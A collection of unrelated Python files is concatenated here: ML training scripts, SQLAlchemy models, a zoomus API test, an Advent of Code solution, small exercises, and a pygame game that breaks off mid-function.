    df = pd.DataFrame([[1, 2, 3], [2, 1, 2], [3, 2, 1]], columns=["x", "y", "z"])
    dataframe = experiment_a.log_dataframe(df, tags=["x", "y"])

    # Render the dataframe plot to a PNG, then log the same artifact three
    # ways: by path, by raw bytes, and by open file handle.
    plot = dataframe.plot(kind="bar")
    plot_path = f"{path}/plot.png"
    hv.save(plot, plot_path, fmt="png")

    project.log_artifact(data_path=plot_path, description="bar plot logged with path")

    with open(plot_path, "rb") as f:
        source_data = f.read()

    project.log_artifact(
        data_bytes=source_data,
        name="plot.png",
        description="bar plot logged with bytes",
    )

    with open(plot_path, "rb") as f:
        project.log_artifact(data_file=f, name="plot.png", description="bar plot logged with file")
if __name__ == "__main__":
    # Write the sample project next to this script under ./data.
    here = os.path.dirname(__file__)
    path = os.path.join(here, "data")
    # log_rubicon returns None, so this exits with status 0.
    sys.exit(log_rubicon(path))
|
import numpy as np
from random import shuffle
import sys
import tensorflow as tf
from tensorflow.image import decode_jpeg, resize
from tensorflow.io import read_file
from tensorflow.nn import softmax, sparse_softmax_cross_entropy_with_logits
from tensorflow.train import AdamOptimizer
tf.compat.v1.enable_eager_execution() # Remove when switching to tf2
from constants import image_size, nb_class
from classifier import Classifier
from preprocess import get_classification_data
from tracking import save_data
weights_path = "./weights/weights"
def get_model():
    """Build a Classifier, run one dummy forward pass so its variables exist,
    then load the saved weights from ``weights_path``."""
    classifier = Classifier()
    # The forward pass forces layer weight creation before load_weights.
    random_image = tf.convert_to_tensor(np.random.random((1, image_size, image_size, 3)), dtype=np.float32)
    classifier(random_image)
    classifier.load_weights(weights_path)
    return classifier
def reset_model():
    """Overwrite ``weights_path`` with the weights of a freshly initialized
    Classifier, effectively resetting training progress."""
    classifier = Classifier()
    # Forward pass forces weight creation before saving.
    random_image = tf.convert_to_tensor(np.random.random((1, image_size, image_size, 3)), dtype=np.float32)
    classifier(random_image)
    classifier.save_weights(weights_path)
def get_img(img_path):
    """Load a JPEG from *img_path*, resize it to (image_size, image_size),
    and scale pixel values into [0, 1]."""
    raw = read_file(img_path)
    decoded = decode_jpeg(raw, channels=3)
    resized = resize(decoded, [image_size, image_size])
    return resized / 255.0
def train():
    """Fine-tune the classifier on the training set one image at a time,
    saving weights every 1000 images and once more at the end."""
    classifier = get_model()
    opt = AdamOptimizer(1e-5)
    images_data = get_classification_data("../data/data_classification_train.json")
    count = 0
    print("Training started")
    shuffle(images_data)
    for (i, label) in images_data:
        img = get_img("../pictures/pictures_classification_train/{}.png".format(i))
        # Loss closure re-evaluated by the optimizer; captures this
        # iteration's img/label.
        def get_loss():
            img_vector = tf.convert_to_tensor([img], dtype=np.float32)
            logits = classifier(img_vector)
            entropy = sparse_softmax_cross_entropy_with_logits(labels=[label], logits=logits)
            # Reduce the batch-of-one loss tensor to a scalar.
            entropy = tf.gather(entropy, 0)
            save_data(label, logits[0].numpy().tolist(), entropy.numpy().tolist())
            return entropy
        opt.minimize(get_loss)
        count += 1
        if (count % 1000 == 0):
            classifier.save_weights(weights_path)
            print("Weights saved")
    classifier.save_weights(weights_path)
    print("Weights saved")
def evaluate(num):
    """Run the classifier over evaluation set *num* and print top-1 accuracy
    overall and per label."""
    classifier = get_model()
    images_data = get_classification_data("../data/data_classification_evaluate_{}.json".format(num))
    count = 0                     # total correct top-1 predictions
    succeeds = [0] * nb_class     # correct predictions per label
    total = [0] * nb_class        # samples seen per label
    for (i, label) in images_data:
        img = get_img("../pictures/pictures_classification_evaluate_{}/{}.png".format(num, i))
        img_vector = tf.convert_to_tensor([img], dtype=np.float32)
        logits = classifier(img_vector).numpy()[0]
        total[label] += 1
        if (np.argmax(logits) == label):
            succeeds[label] += 1
            count += 1
            print("  {} {}".format(label, logits.tolist()))
        else:
            print("X {} {}".format(label, logits.tolist()))
    print("Number of probs where label prob is the max: {}/{}".format(count, len(images_data)))
    for label in range(nb_class):
        print("Label {}: {}/{}".format(label, succeeds[label], total[label]))
# Command-line dispatch: `python main.py [reset|train|evaluate <size>]`.
instruction = None
if len(sys.argv) > 1:
    instruction = sys.argv[1]
param = None
if len(sys.argv) > 2:
    param = sys.argv[2]
if (instruction == "reset"):
    reset_model()
elif (instruction == "train"):
    train()
elif (instruction == "evaluate"):
    # Fix: use membership test instead of bitwise `|` on comparison results.
    if param in ("100", "10000"):
        evaluate(param)
    else:
        print("Usage: 'python main.py evaluate [100, 10000]'")
else:
    print("Usage: 'python main.py [train, evaluate, reset]'")
|
class Metacls(type):
    """Demonstration metaclass that traces class creation and instantiation."""

    def __new__(mcs, *args, **kwargs):
        # make a new class object from mcs.
        # Fix: __new__ is an implicit staticmethod — no @classmethod needed.
        # The old @classmethod version only "worked" because the doubly-bound
        # metaclass was re-inserted as the first element of *args.
        print(f"META __new__ : {mcs} with:{args} - {kwargs}")
        # returns a class
        return super().__new__(mcs, *args, **kwargs)

    def __init__(cls, *args, **kwargs):
        # initialize the cls
        print(f"META __init__ : {cls} with:{args} - {kwargs}")
        # returns None
        super().__init__(*args, **kwargs)

    def __call__(cls, *args, **kwargs):
        # make an instance of a cls - a call on the class
        print(f"META __call__ : {cls} with: {args} - {kwargs}")
        # returns an instance of cls
        return super().__call__(*args, **kwargs)
class Base(metaclass=Metacls):
    """Demonstration class that traces instance creation and calls."""

    def __new__(cls, *args, **kwargs):
        # make a new instance object of cls.
        # Fix: __new__ is an implicit staticmethod — no @classmethod needed.
        # The old @classmethod version only "worked" because the doubly-bound
        # class was re-inserted into *args.
        print(f"CLASS __new__ : {cls} with: {args} - {kwargs}")
        # object.__new__ accepts only the class to instantiate.
        return super().__new__(cls)

    def __init__(self, *args, **kwargs):
        # initialize the instance self
        print(f"CLASS __init__ : {self} with: {args} - {kwargs}")
        # object.__init__ takes no extra arguments.
        super().__init__()

    def __call__(self, *args, **kwargs):
        # a call on the instance
        print(f"CLASS __call__ : {self} with: {args} - {kwargs}")
        # can return anything or None
        return
# Base() triggers Metacls.__call__ then Base.__new__/__init__;
# instance() triggers Base.__call__ (which returns None).
instance = Base()
value = instance()
|
if __name__ == '__main__':
    from andrew_packages.programming_problems.greedy.bandtexts_problem.method1 import RandomLengths
    # Generate random text lengths to schedule.
    size = 20
    text_lengths = RandomLengths(size)
    print("Initial data:")
    print(text_lengths)
    import matplotlib.pyplot as plt
    plt.plot(text_lengths)
    plt.show()
    # generating opposite waves: even-indexed items form one half,
    # odd-indexed items the other
    wave1 = [text_lengths[index] for index in range(0, len(text_lengths), 2)]
    wave2 = [text_lengths[index] for index in range(1, len(text_lengths), 2)]
    from andrew_packages.util.algorithms import Sorting
    sort = Sorting()
    # Sort one half ascending and the other descending.
    sort.QuickSort(wave1)
    sort.QuickSort(wave2, reverse=True)
    # Interleave the two halves so short and long texts alternate.
    solution = []
    for item_ascending, item_descending in zip(wave1, wave2):
        solution.append(item_ascending)
        solution.append(item_descending)
    print("Optimal order for texts is:")
    print(solution)
|
import sys
import os
import sqlalchemy
import datetime
from sqlalchemy import Column, ForeignKey, Integer, String, Text, DateTime, BigInteger
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import create_engine
from flask_login import UserMixin
# Declarative base shared by all ORM models below.
Base = declarative_base()
class User(UserMixin, Base):
    """Application user account (flask-login compatible via UserMixin)."""
    __tablename__ = 'user'

    id = Column(Integer, primary_key=True)
    name_first = Column(String(80))
    name_last = Column(String(80))
    username = Column(String(80))
    # presumably the (hashed?) password — confirm against the auth code
    p = Column(String(80), nullable=False)
    email = Column(String(180), nullable=False)
    follow = Column(Text())
    # NOTE(review): column name is misspelled ("followers"); renaming it
    # would change the database schema, so it is kept as-is.
    follwers = Column(Text())
    bio = Column(Text())
    profile_picture = Column(String(150))
class Image(Base):
    """An uploaded image with per-reaction totals and reacting-user lists."""
    __tablename__ = 'image'

    id = Column(Integer, primary_key=True)
    path = Column(String(150), nullable=False)
    user_id = Column(Integer, ForeignKey('user.id'))
    user = relationship(User)
    # Reaction counters.
    heart_tot = Column(Integer, default=0)
    laugh_tot = Column(Integer, default=0)
    cry_tot = Column(Integer, default=0)
    # Users who reacted, per reaction type.
    heart_usrs = Column(Text())
    laugh_usrs = Column(Text())
    cry_usrs = Column(Text())
    img_desc = Column(Text())
    # cmt_tot = Column(
    #     Integer, default = 0)
class Cmts(Base):
    """A comment left by a user on an image."""
    __tablename__ = 'cmts'

    id = Column(Integer, primary_key=True)
    img_id = Column(Integer, ForeignKey('image.id'))
    image = relationship(Image)
    cmt_owner = Column(Integer, ForeignKey('user.id'))
    user = relationship(User)
    cmt = Column(Text())
# Connect to (or create) the SQLite database and emit CREATE TABLE
# statements for all models declared above.
engine = create_engine('sqlite:///up.db')
Base.metadata.create_all(engine)
|
import pygame
from bullet_patterns.no_scope import NoScope
from bullet_alien import BulletAlienCinco
class Cyclone(NoScope):
    """A derivative of the NoScope class: fires a rotating stream of bullets
    for a fixed duration, then falls back to a plain NoScope burst pattern."""
    def __init__(self, main_game, shooter):
        super().__init__(main_game, shooter)
        # Denser ring than NoScope, with the per-bullet angle derived from it.
        self.bullets_per_ring = self.settings.nope_bullets_ring * 2.5
        self.angle = 360 // self.bullets_per_ring
        self.bullet_cooldown = self.settings.cyclone_bullet_cooldown
        # How long (ms) the cyclone phase lasts before handing over to NoScope.
        self.cyclone_time = self.settings.cyclone_time
        self.start_time = pygame.time.get_ticks()
        self.angle_increment = self.angle
        # Fallback pattern used once the cyclone phase has expired.
        self.no_scope = NoScope(main_game, shooter)
        self.cyclone = True
        self.confirmed_start = True
    def shoot_burst(self):
        """Shoot the boolet in burst of straight line. Do it like the alien_movement cooldown"""
        self._check_cyclone_time()
        """yeah, I have to check if any bursts left to move onto next pattern"""
        if self.cyclone:
            self._check_bullet_cooldown()
            if not self.shoot_disabled:
                # Shoot a bullet and then disable the shooting ability until cooldown
                self.shoot_boolet()
                self.last_bullet_fired = pygame.time.get_ticks()
                self.bullets_left -= 1
                # Rotate the firing direction for the next shot.
                self.angle -= self.angle_increment
                self.shoot_disabled = True
        else:
            # Cyclone phase over: delegate to the plain NoScope pattern.
            self.no_scope.shoot_burst()
    def shoot_boolet(self):
        """A cyclone of bullets"""
        bullet = BulletAlienCinco(self.main_game, shooter=self.shooter)
        # Start pointing straight down, then rotate by the current angle.
        bullet.vector[0] = 0
        bullet.vector[1] = 1
        bullet.normalized_vector = bullet.vector.normalize()
        bullet.normalized_vector = bullet.normalized_vector.rotate(self.angle)
        self.main_game.alien_bullets.add(bullet)
    def _check_bullet_cooldown(self):
        """Yeah, I don't want it to turn into a lazer beam of ultimate lethality"""
        now = pygame.time.get_ticks()
        if now - self.last_bullet_fired >= self.bullet_cooldown:
            self.shoot_disabled = False
    def _check_cyclone_time(self):
        # Latch the phase start on the first call, then expire the cyclone
        # once cyclone_time milliseconds have elapsed.
        now = pygame.time.get_ticks()
        if self.confirmed_start:
            self.start_time = pygame.time.get_ticks()
            self.confirmed_start = False
        if now - self.start_time >= self.cyclone_time:
            self.cyclone = False
    def reset(self):
        # Flags to use in tandem with cooldown
        self.cyclone = True # This for delay between burst
        self.shoot_disabled = False # This is for boolet's delay
        self.confirmed_start = True
        # NOTE(review): __init__ starts angle at 360 // bullets_per_ring —
        # confirm resetting to 0 here is intended.
        self.angle = 0
        # Imported from settings.py
        self.start_time = pygame.time.get_ticks()
        self.last_bullet_fired = pygame.time.get_ticks()
        # Dynamic bullet_count and burst_count
        # (bullets_per_burst presumably set by the NoScope parent — verify)
        self.bullets_left = self.bullets_per_burst
|
import numpy as np
from matplotlib import pyplot as plt
import pandas as pd
from sklearn.tree import DecisionTreeClassifier

# MNIST-style CSV: label in column 0, 784 pixel values after it.
dataset = pd.read_csv("C:/Users/Sarthak/Downloads/train.csv")

clf = DecisionTreeClassifier()

# Training split: first 21000 rows.
xtrain = dataset.iloc[0:21000, 1:].values
train_label = dataset.iloc[0:21000, 0].values
clf.fit(xtrain, train_label)

# Testing split: remaining rows.
xtest = dataset.iloc[21000:, 1:].values
actual_label = dataset.iloc[21000:, 0].values

# Show one sample and its prediction.
d = xtest[8]  # can use any index below the test-split size
d.shape = (28, 28)
plt.imshow(255 - d, cmap="gray")  # invert so the digit is black on white
plt.show()
print(clf.predict([xtest[8]]))

# Accuracy over the test split.
# Fix: predict on the 2-D test matrix directly (was clf.predict([xtest]),
# which wraps it into a 3-D array), and count only predictions that match
# the actual label (the old loop counted every row and tested truthiness
# of the prediction, reporting ~100% regardless of correctness).
p = clf.predict(xtest)
count = 0
for i in range(len(xtest)):
    if p[i] == actual_label[i]:
        count += 1
print("ACCURACY", (count / len(xtest)) * 100)
|
import datetime
import unittest
from zoomus import components, util
import responses
def suite():
    """Collect this module's test cases into a single test suite."""
    tests = unittest.TestSuite()
    tests.addTest(unittest.makeSuite(PollsV2TestCase))
    return tests
class PollsV2TestCase(unittest.TestCase):
    """Tests for the v2 past-webinar polls endpoint."""

    def setUp(self):
        # Component under test, pointed at a fake base URI; the `responses`
        # library intercepts HTTP so no real requests are made.
        self.component = components.past_webinar.PastWebinarComponentV2(
            base_uri="http://www.foo.com",
            config={"version": util.API_VERSION_2, "token": "token"},
        )

    @responses.activate
    def test_can_list(self):
        responses.add(
            responses.GET, "http://www.foo.com/past_webinars/ID/polls",
        )
        self.component.get_polls(webinar_id="ID")
        # The bearer token from the config must be sent with the request.
        expected_headers = {"Authorization": "Bearer token"}
        actual_headers = responses.calls[0].request.headers
        self.assertTrue(
            set(expected_headers.items()).issubset(set(actual_headers.items()))
        )
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
import torch
from tqdm import tqdm
from utils.utils import get_lr
def fit_one_epoch(model_train, model, yolo_loss, loss_history, optimizer, epoch, epoch_step, epoch_step_val, gen, gen_val, Epoch, cuda):
    """Run one training epoch followed by one validation epoch.

    Accumulates the YOLO loss over `epoch_step` training batches and
    `epoch_step_val` validation batches, records both averages in
    `loss_history`, and checkpoints `model` to logs/.
    """
    loss        = 0
    val_loss    = 0

    model_train.train()
    print('Start Train')
    with tqdm(total=epoch_step,desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar:
        for iteration, batch in enumerate(gen):
            if iteration >= epoch_step:
                break

            images, targets = batch[0], batch[1]
            with torch.no_grad():
                if cuda:
                    images  = torch.from_numpy(images).type(torch.FloatTensor).cuda()
                    targets = [torch.from_numpy(ann).type(torch.FloatTensor).cuda() for ann in targets]
                else:
                    images  = torch.from_numpy(images).type(torch.FloatTensor)
                    targets = [torch.from_numpy(ann).type(torch.FloatTensor) for ann in targets]
            #----------------------#
            #   Zero the gradients
            #----------------------#
            optimizer.zero_grad()
            hidden = model_train.init_hidden(images.shape[0])
            #----------------------#
            #   Forward pass
            #   (repeated model_train.p times, carrying the hidden state —
            #   presumably iterative refinement; only the last outputs are
            #   used for the loss. TODO confirm intent.)
            #----------------------#
            for p in range(model_train.p):
                outputs,hidden      = model_train.network(images,hidden)
            loss_value_all  = 0
            num_pos_all     = 0
            #----------------------#
            #   Compute the loss over all output scales
            #----------------------#
            for l in range(len(outputs)):
                loss_item, num_pos = yolo_loss(l, outputs[l], targets)
                loss_value_all  += loss_item
                num_pos_all     += num_pos
            loss_value = loss_value_all / num_pos_all
            #----------------------#
            #   Backward pass
            #----------------------#
            loss_value.backward()
            optimizer.step()

            loss += loss_value.item()

            pbar.set_postfix(**{'loss'  : loss / (iteration + 1),
                                'lr'    : get_lr(optimizer)})
            pbar.update(1)

    print('Finish Train')

    model_train.eval()
    print('Start Validation')
    with tqdm(total=epoch_step_val, desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar:
        for iteration, batch in enumerate(gen_val):
            if iteration >= epoch_step_val:
                break
            images, targets = batch[0], batch[1]
            with torch.no_grad():
                if cuda:
                    images  = torch.from_numpy(images).type(torch.FloatTensor).cuda()
                    targets = [torch.from_numpy(ann).type(torch.FloatTensor).cuda() for ann in targets]
                else:
                    images  = torch.from_numpy(images).type(torch.FloatTensor)
                    targets = [torch.from_numpy(ann).type(torch.FloatTensor) for ann in targets]
                #----------------------#
                #   Zero the gradients (no-op here: no backward pass is
                #   performed during validation)
                #----------------------#
                optimizer.zero_grad()
                #----------------------#
                #   Forward pass
                #----------------------#
                outputs         = model_train(images)
                loss_value_all  = 0
                num_pos_all     = 0
                #----------------------#
                #   Compute the loss over all output scales
                #----------------------#
                for l in range(len(outputs)):
                    loss_item, num_pos = yolo_loss(l, outputs[l], targets)
                    loss_value_all  += loss_item
                    num_pos_all     += num_pos
                loss_value  = loss_value_all / num_pos_all

            val_loss += loss_value.item()
            pbar.set_postfix(**{'val_loss': val_loss / (iteration + 1)})
            pbar.update(1)

    print('Finish Validation')

    loss_history.append_loss(loss / epoch_step, val_loss / epoch_step_val)
    print('Epoch:'+ str(epoch+1) + '/' + str(Epoch))
    print('Total Loss: %.3f || Val Loss: %.3f ' % (loss / epoch_step, val_loss / epoch_step_val))
    torch.save(model.state_dict(), 'logs/ep%03d-loss%.3f-val_loss%.3f.pth' % (epoch + 1, loss / epoch_step, val_loss / epoch_step_val))
|
# Read the puzzle input: one "X bags contain ..." rule per line.
inputFile = open("/Users/samuelcordano/Documents/adventOfCode/Day7_HandyHaversacks/inputFile.txt","r")
Lines = inputFile.readlines()
class bag:
    """Node in the bag-containment graph: tracks child bags, parent bags,
    and a visited flag used during traversal."""

    def __init__(self, name, childBags, parentBags) -> None:
        self.name = name
        self.childBags = childBags
        self.parentBags = parentBags
        self.visited = False

    def __str__(self):
        return f"name: {self.name} | childBags: {self.childBags}| parentBags: {self.parentBags}| visited: {self.visited}"
# name -> bag object, for every bag mentioned anywhere in the rules
listOfBags = {}
def createGraph():
    """
    Parse each input rule line and build the bag-containment graph in
    ``listOfBags``: every bag is linked to its child bags and back-linked
    to its parents. (The previous docstring was copied from a different
    puzzle and did not describe this function.)
    """
    counter =0 #testing purposes
    for line in Lines:
        counter +=1
        currentInput = line.strip()
        #Clean Inputs
        print(f"currentInput is: {currentInput}")
        currentBag = currentInput.split(" bags")[0]
        #currentBagName = currentBag.replace(" ", "_")
        # Normalize "bag"/"bags" wording, then split the contained-bag list
        # and drop each leading count (first two characters, e.g. "2 ").
        currentChildBags = currentInput.split(" contain ",1)[1]
        currentChildBags = currentChildBags.replace(" bag.", " bags.")
        currentChildBags = currentChildBags.split(" bags.")[0]
        currentChildBags = currentChildBags.replace(" bag, ", " bags, ")
        currentChildBags = currentChildBags.split(" bags, ")
        currentChildBags = [element[2:] for element in currentChildBags]
        print(f"currentBag is: {currentBag}")
        print(f"childBags is: {currentChildBags}")
        # "no other bags" rules produce [" other"] after trimming — treat as empty.
        if currentChildBags == [" other"]:
            currentChildBags = []
        print(f"childBags new is: {currentChildBags}")
        print(" ")
        #Create objectfor current bag if it doesn't exist:
        if currentBag in listOfBags:
            currentBagObject = listOfBags.get(currentBag)
            currentBagObject.childBags = currentChildBags
        else:
            listOfBags[currentBag] = bag(currentBag,currentChildBags,[])
        #For each childbag, create an object if it isn't done and add current bag as a parentbag
        for childBag in currentChildBags:
            if childBag not in listOfBags:
                listOfBags[childBag] = bag(childBag,[],[currentBag])
            else:
                currentChildBagObject = listOfBags.get(childBag)
                currentChildBagObject.parentBags = currentChildBagObject.parentBags + [currentBag]
        #if counter ==10:
        #    return True
# Accumulates every bag that can (transitively) contain a shiny gold bag.
listOfParentsShinyGold = []
def findAllParentBags(originalBag,listOfParentsShinyGold):
    """Depth-first walk up the parent links from *originalBag*, appending
    each newly visited ancestor bag name to *listOfParentsShinyGold*
    (mutated in place). Uses the per-bag ``visited`` flag to avoid cycles
    and duplicates."""
    print(originalBag)
    currentOriginalBagObject = listOfBags.get(originalBag)
    listOfParentBags = currentOriginalBagObject.parentBags
    for parentBag in listOfParentBags:
        currentParentBagObject = listOfBags.get(parentBag)
        if not currentParentBagObject.visited:
            currentParentBagObject.visited = True
            listOfParentsShinyGold += [parentBag]
            findAllParentBags(parentBag,listOfParentsShinyGold)
# Build the graph, dump it for inspection, then count how many bag colors
# can eventually contain a shiny gold bag (the puzzle answer).
createGraph()
print("TESTING")
for individualBag in listOfBags:
    currentBagObject = listOfBags.get(individualBag)
    print(currentBagObject)
findAllParentBags("shiny gold",listOfParentsShinyGold)
print(listOfParentsShinyGold)
print(len(listOfParentsShinyGold))
|
# Read n integers from stdin, split them into non-negative and negative
# buckets, then report both lists plus a count/sum summary.
n = int(input())
positive_int = []
negative_int = []
for _ in range(n):
    value = int(input())
    # Route non-negative values to one bucket, negatives to the other.
    (positive_int if value >= 0 else negative_int).append(value)
print(positive_int)
print(negative_int)
print(f"Count of positives: {len(positive_int)}. Sum of negatives: {sum(negative_int)}")
|
import argparse
def get_arguments():
    """Build and return the command-line argument parser (not yet parsed)."""
    arg_parser = argparse.ArgumentParser()
    #parser.add_argument('--mode', help='task to be done', default='train')

    # Load / input / save configuration.
    arg_parser.add_argument('--out', help='output folder for checkpoint', default='./log/lstm_gcn/')
    arg_parser.add_argument('--gap_save', help='gap between save model', default=50)
    arg_parser.add_argument('--data', help='the path to dataset', default="./dataset/dance_music_paired.json")
    arg_parser.add_argument('--pretrain_GCN', help='the pretrain GCN', default='./pretrain_model/GCN.pth')

    # Optimization hyper-parameters.
    arg_parser.add_argument('--niter', type=int, default=800, help='number of epochs to train')
    arg_parser.add_argument('--batch_size', type=int, default=16, help='batch_size')
    arg_parser.add_argument('--lr_g', type=float, default=0.0003, help='learning rate')
    arg_parser.add_argument('--gap', help='train n iter if D while train 1 iter of G', default=1)
    arg_parser.add_argument('--lr_d_frame', type=float, default=0.0003, help='learning rate')
    arg_parser.add_argument('--lr_d_seq', type=float, default=0.0005, help='learning rate')
    arg_parser.add_argument('--lambda_grad', type=float, help='gradient penelty weight', default=1)
    arg_parser.add_argument('--alpha', type=float, help='reconstruction loss weight', default=200)
    arg_parser.add_argument('--encoder', type=str, help='gru, lstm, or tcn', default='gru')
    arg_parser.add_argument('--resume', action='store_true', help='load weights and continue training')
    arg_parser.add_argument('--gcn', action='store_true', help='use perceptual loss')
    return arg_parser
|
#!/usr/bin/python3
"""Sum the integer command-line arguments and print the total."""
from sys import argv

res = 0
first = True
if __name__ == "__main__":
    first = False  # argv always holds at least the script name
    # Skip argv[0] (the script path) and accumulate the rest.
    for num in argv[1:]:
        res += int(num)
    print('{}'.format(res))
|
import pygame
import random
import decimal
import math
import time
import os
pygame.init()
# Window geometry and frame rate.
width = 1466
height = 768
size = (width, height)
FPS = 120
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
myfont = pygame.font.SysFont('Comic Sans MS', 30)
# Symmetric list of angles (degrees); mirrored around its midpoint.
angle = []
angle.append(10)
angle.append(24)
angle.append(44)
angle.append(73)
angle.append(73)
angle.append(44)
angle.append(24)
angle.append(10)
ballSpeed = 1
clicked = False
screen = pygame.display.set_mode(size)
pygame.display.set_caption("Rotating Factory Escape")
Clock = pygame.time.Clock()
# Two-state toggle lists: [current, other].
homeScreenMode = [True, False]
global scoreModifier
global score
score = 0
scoreModifier = 50
global highscore
highscore = 0
global playerNum
playerNum = 0
pickPlayer = [False, True]
speed1 = 10
speed2 = 20
speed = 0
cheatMenu = False
playerSpeed = 8
beforeSpeed = playerSpeed
lost = False
doorHeight = height/2 - 100
global levelNum
levelNum = 0
# NOTE(review): shadows the builtin `exit`; consider renaming.
exit = False
pygame.mixer.init()
# Asset locations and filename lists for gears, backgrounds, and players.
game_folder = os.path.dirname("../../img")
MySpritesFolder = os.path.join(game_folder, "img")
gear = ["gear.png", "gear1.png", "gear2.png", "gear3.png", "gear4.png", "gear5.png", "gear6.png"]
back = ["back1.jpg","back2.jpg","back3.jpg","back4.jpg","back5.jpg","back6.jpg","back7.jpg","back8.jpg",\
        "back9.jpg","back10.jpg","back11.jpg","back12.jpg","back13.jpg","back14.jpg","back15.jpg"]
players = ["player.png", "player1.png", "player2.png", "player3.png", "player4.png", "player5.png", "player6.png","player7.png", "player8.png", "player9.png"]
#---------------------------------HOMESCREEN CLASS-----------------------HOMESCREEN CLASS----------------------------------
class homeScreen(pygame.sprite.Sprite):
    """Title screen: draws the background, play button and title, then
    handles player-character selection before the game starts."""
    def __init__(self):
        pygame.sprite.Sprite.__init__(self)
        # Full-screen background image.
        self.background = pygame.image.load(os.path.join(MySpritesFolder, "homeGear.jpg")).convert()
        self.background_rect = self.background.get_rect()
        screen.blit(self.background, self.background_rect)
        # Centered play button; white is treated as transparent.
        self.playButton = pygame.image.load(os.path.join(MySpritesFolder, "play_200x100.png")).convert()
        self.play_rect = self.playButton.get_rect()
        self.play_rect.centerx = width / 2
        self.play_rect.centery = height / 2
        self.playButton.set_colorkey(WHITE)
        screen.blit(self.playButton, self.play_rect)
        # Game title along the top edge.
        self.title = pygame.image.load(os.path.join(MySpritesFolder, "title.png")).convert()
        self.title_rect = self.title.get_rect()
        self.title_rect.centerx = width / 2
        self.title.set_colorkey(WHITE)
        screen.blit(self.title, self.title_rect)
    def update(self):
        # Enter/Space advances to the player picker: removing False from
        # pickPlayer makes pickPlayer[0] truthy in the main loop.
        self.keystate = pygame.key.get_pressed()
        if self.keystate[pygame.K_RETURN] or self.keystate[pygame.K_SPACE]:
            pickPlayer.remove(False)
    def choosePlayer(self):
        """Draw the selectable player sprites and start the game when the
        user presses the matching number key (1-9; 0 selects player 10)."""
        # White strip behind the row of selectable players.
        self.image = pygame.Surface((width/len(players) * len(players) - width/len(players) + 80, (height/2)/len(players) * len(players) - (height/2)/len(players) -80))
        self.image.fill(WHITE)
        #self.rect = self.image.get_rect
        #self.rect.left = width/len(players)
        #self.rect.top = height/2 + 150
        screen.blit(self.image, (width/len(players)- 100, height/2 + 80))
        dis = width/(len(players)+0)  # horizontal spacing between entries
        for g in range(0,len(players)):
            self.textSurface = myfont.render("Player " + str((g+1)), False, BLACK)
            screen.blit(self.textSurface,(dis,(height/2) + 100))
            self.image = pygame.image.load(os.path.join(MySpritesFolder, players[g])).convert()
            self.image.set_colorkey(WHITE)
            self.rect = self.image.get_rect()
            self.rect.top = (height / 2) + 150
            self.rect.x = dis
            screen.blit(self.image, self.rect)
            dis += width/(len(players)+0)
        self.keystate = pygame.key.get_pressed()
        keys = [pygame.K_1, pygame.K_2, pygame.K_3, pygame.K_4, pygame.K_5, pygame.K_6, pygame.K_7, pygame.K_8, pygame.K_9, pygame.K_0]
        for com in range(len(keys)):
            if self.keystate[keys[com]]:
                global playerNum
                playerNum = com
                print(str(playerNum))
                # Leaving home-screen mode starts the game proper.
                homeScreenMode.remove(True)
                time.sleep(0.5)  # debounce before gameplay begins
                Level.nextLevel()
#---------------------------------PLAYER CLASS-----------------------PLAYER CLASS----------------------------------
class Player(pygame.sprite.Sprite):
    """The user-controlled sprite; moves with the arrow keys or WASD and
    is clamped to the visible screen."""

    def __init__(self):
        pygame.sprite.Sprite.__init__(self)
        # Player sprite sheets are 120x146, 120x114 or 120x150 pixels.
        sprite_path = os.path.join(MySpritesFolder, players[playerNum])
        self.image = pygame.image.load(sprite_path).convert()
        self.image.set_colorkey(WHITE)
        self.rect = self.image.get_rect()
        self.radius = int(self.rect.width * .85 / 2)
        self.rect.top = height / 2
        self.rect.left = width - 50

    def update(self):
        """Apply keyboard movement for this frame, then clamp on screen."""
        self.speedx = 0
        self.speedy = 0
        self.keystate = pygame.key.get_pressed()
        global playerSpeed
        # Keys alternate (negative direction, positive direction); the
        # first half of the list steers horizontally, the second half
        # vertically.  When opposing keys are held, the later entry wins.
        keys = [pygame.K_LEFT, pygame.K_RIGHT, pygame.K_a, pygame.K_d,
                pygame.K_UP, pygame.K_DOWN, pygame.K_w, pygame.K_s]
        half = len(keys) / 2
        for idx, key in enumerate(keys):
            if not self.keystate[key]:
                continue
            delta = playerSpeed if idx % 2 == 1 else playerSpeed * -1
            if idx < half:
                self.speedx = delta
            else:
                self.speedy = delta
        self.rect.x += self.speedx
        self.rect.y += self.speedy
        # Keep the sprite fully inside the window.
        if self.rect.right > width:
            self.rect.right = width
        if self.rect.left < 0:
            self.rect.left = 0
        if self.rect.top < 0:
            self.rect.top = 0
        if self.rect.bottom > height:
            self.rect.bottom = height
#---------------------------------BALL CLASS-----------------------BALL CLASS----------------------------------
class Ball(pygame.sprite.Sprite):
    """A rotating gear obstacle that travels a closed 16-waypoint loop
    approximating a circle around a random centre point."""
    def __init__(self, speed):
        pygame.sprite.Sprite.__init__(self)
        # Pick a random gear image; white is treated as transparent.
        num = random.randrange(0, len(gear))
        self.image_orig = pygame.image.load(os.path.join(MySpritesFolder, gear[num])).convert()
        self.image_orig.set_colorkey(WHITE)
        self.image = self.image_orig.copy()
        self.rect = self.image.get_rect()
        self.radius = int(self.rect.width * .85 / 2)
        # Radius of the circular path this gear follows.
        self.cirRadius = random.randint(70, 400)
        global scoreModifier
        # First half of the gear list = larger gears = bigger score bonus.
        for d in range(0, int(len(gear)/2)):
            if num == d:
                scoreModifier += 25
                print("Score Big Modified")
        for d in range(int(len(gear)/2), len(gear)):
            if num == d:
                scoreModifier += 15
                print("Score Small Modified")
        # Higher smoothness = more sub-steps per segment; rewarded with score.
        self.smoothness = random.randint(3, 20)
        if self.smoothness > 8 and self.smoothness < 11:
            scoreModifier += 18
        if self.smoothness > 11:
            scoreModifier += 28
        # Waypoint coordinates and per-waypoint movement deltas.
        self.rect_x = []
        self.rect_y = []
        self.change_x = []
        self.change_y = []
        self.turn = 1
        # Random centre of the circular path (kept on the left half).
        self.cp_x = random.randint(50, width / 2)
        self.cp_y = random.randint(10, height - 10)
        print("Check 1")
        # Build 16 waypoints, 4 per quadrant: the sign of the cos/sin
        # terms selects the quadrant, and the mirrored `angle` table
        # sweeps each quarter-arc.
        for count in range(0, 4):
            for z in range(0,4):
